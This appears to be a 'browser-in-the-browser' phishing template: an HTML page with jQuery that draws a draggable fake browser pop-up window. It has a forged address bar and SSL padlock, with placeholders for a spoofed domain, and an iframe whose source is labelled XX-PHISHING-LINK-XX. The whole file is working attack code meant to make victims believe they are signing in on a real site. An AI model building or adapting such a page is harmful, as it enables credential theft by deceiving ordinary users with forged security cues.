<!DOCTYPE html>
<html lang="ko">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        @font-face {
            font-family: system;
            font-style: normal;
            font-weight: 300;
            src: local(".SFNSText-Light"), local(".HelveticaNeueDeskInterface-Light"),
                local("Roboto-Light"), local("DroidSans"), local("Tahoma"),
                local(".LucidaGrandeUI"), local("Ubuntu Light"), local("Segoe UI Light");
        }

        html,
        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
        }

        #title-bar {
            height: 31px;
            background-color: #d6dae0;
            width: 100%;
            display: flex;
            justify-content: space-between;
            user-select: none;
        }

        #logo {
            padding-left: 5px;
            vertical-align: middle;
        }

        #logo-description {
            color: black;
            font-size: 12px;
            font-family: "system";
            vertical-align: middle;
        }

        #minimize, #square, #exit {
            color: black;
            font-size: 12px;
            padding: 9px 15px;
        }

        #square {
            font-size: 22px;
            padding: 0 15px 5px 15px;
        }

        #exit {
            font-size: 15px;
            padding: 7px 17px;
        }

        #url-bar {
            height: 28px;
            background-color: #f1f3f4;
            width: 100%;
            display: flex;
            align-items: center;
            white-space: nowrap;
            overflow: scroll;
            text-overflow: ellipsis;
            -ms-overflow-style: none;
            scrollbar-width: none;
            border-bottom: 1px solid lightgray;
        }

        #url-bar::-webkit-scrollbar {
            display: none;
        }

        #ssl-padlock {
            user-select: none;
            padding-left: 8px;
            margin-right: 8px;
        }

        #domain-name {
            color: #000000;
            font-size: 14px;
            font-family: "system";
        }

        #domain-path {
            color: #7c7c7c;
            font-size: 14px;
            font-family: "system";
        }

        #title-bar-width {
            width: 100%;
        }

        #content {
            width: 100%;
            height: 700px;
        }

        #window {
            color: transparent;
            background-color: transparent;
            border-color: transparent;
            box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px;
            height: 759px; /* title bar height + content height */
            width: 40%;
        }
    </style>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
</head>
<body>
    <div id="window">
        <!-- Title bar start -->
        <div id="title-bar-width">
            <div id="title-bar">
                <div style="margin-top:5px;">
                    <img src="./logo.svg" width="20px" height="15px" id="logo">
                    <span id="logo-description">XX-TITLE-XX</span>
                </div>
                <div>
                    <span id="minimize">&#8212;</span>
                    <span id="square">□</span>
                    <span id="exit">✕</span>
                </div>
            </div>
            <div id="url-bar">
                <img src="./ssl.svg" width="20px" height="20px" id="ssl-padlock">
                <span id="domain-name">XX-DOMAIN-NAME-XX</span>
                <span id="domain-path">XX-DOMAIN-PATH-XX</span>
            </div>
        </div>
        <!-- Content start -->
        <iframe id="content" src="XX-PHISHING-LINK-XX" frameBorder="0"></iframe>
    </div>

    <script>
        var minimize = document.getElementById("minimize");
        var square = document.getElementById("square");
        var exit = document.getElementById("exit");
        var titleBar = document.getElementById("title-bar");

        ////////////////// Hover listeners //////////////////
        minimize.addEventListener('mouseover', function handleMouseOver() {
            minimize.style.backgroundColor = 'rgba(0, 0, 0, 0.09765625)';
            minimize.style.cursor = 'context-menu';
        });

        minimize.addEventListener('mouseout', function handleMouseOut() {
            minimize.style.backgroundColor = '#d6dae0';
            minimize.style.cursor = 'default';
        });

        square.addEventListener('mouseover', function handleMouseOver() {
            square.style.backgroundColor = 'rgba(0, 0, 0, 0.09765625)';
            square.style.cursor = 'context-menu';
        });

        square.addEventListener('mouseout', function handleMouseOut() {
            square.style.backgroundColor = '#d6dae0';
            square.style.cursor = 'default';
        });

        exit.addEventListener('mouseover', function handleMouseOver() {
            exit.style.backgroundColor = '#E81123';
            exit.style.cursor = 'context-menu';
        });

        exit.addEventListener('mouseout', function handleMouseOut() {
            exit.style.backgroundColor = '#d6dae0';
            exit.style.cursor = 'default';
        });

        titleBar.addEventListener('mouseover', function handleMouseOver() {
            titleBar.style.cursor = 'context-menu';
        });

        titleBar.addEventListener('mouseout', function handleMouseOver() {
            titleBar.style.cursor = 'default';
        });

        ////////////////// Make window draggable start ////////////////
        var draggable = $('#window');
        var title = $('#title-bar');

        title.on('mousedown', function(e){
            var dr = $(draggable).addClass("drag");
            var height = dr.outerHeight();
            var width = dr.outerWidth();
            var ypos = dr.offset().top + height - e.pageY;
            var xpos = dr.offset().left + width - e.pageX;
            $(document.body).on('mousemove', function(e){
                var itop = e.pageY + ypos - height;
                var ileft = e.pageX + xpos - width;
                if(dr.hasClass("drag")){
                    dr.offset({top: itop, left: ileft});
                }
            }).on('mouseup', function(e){
                dr.removeClass("drag");
            });
        });
        ////////////////// Make window draggable end ////////////////

        //////////////////// Onclick listeners //////////////////
        $("#exit").click(function(){
            $("#window").css("display", "none");
        });

        // Maximize button functionality
        $("#square").click(enlarge);

        function enlarge(){
            if(square.classList.contains("enlarged")){
                $("#window").css("width", "40%");
                $("#title-bar-width").css('width', '100%');
                $("#content").css("width", "100%");
                $("#square").removeClass("enlarged");
            } else {
                $("#window").css("width", "70%");
                $("#title-bar-width").css('width', '100%');
                $("#content").css("width", "100%");
                $("#square").addClass("enlarged");
            }
        }
    </script>
</body>
</html>
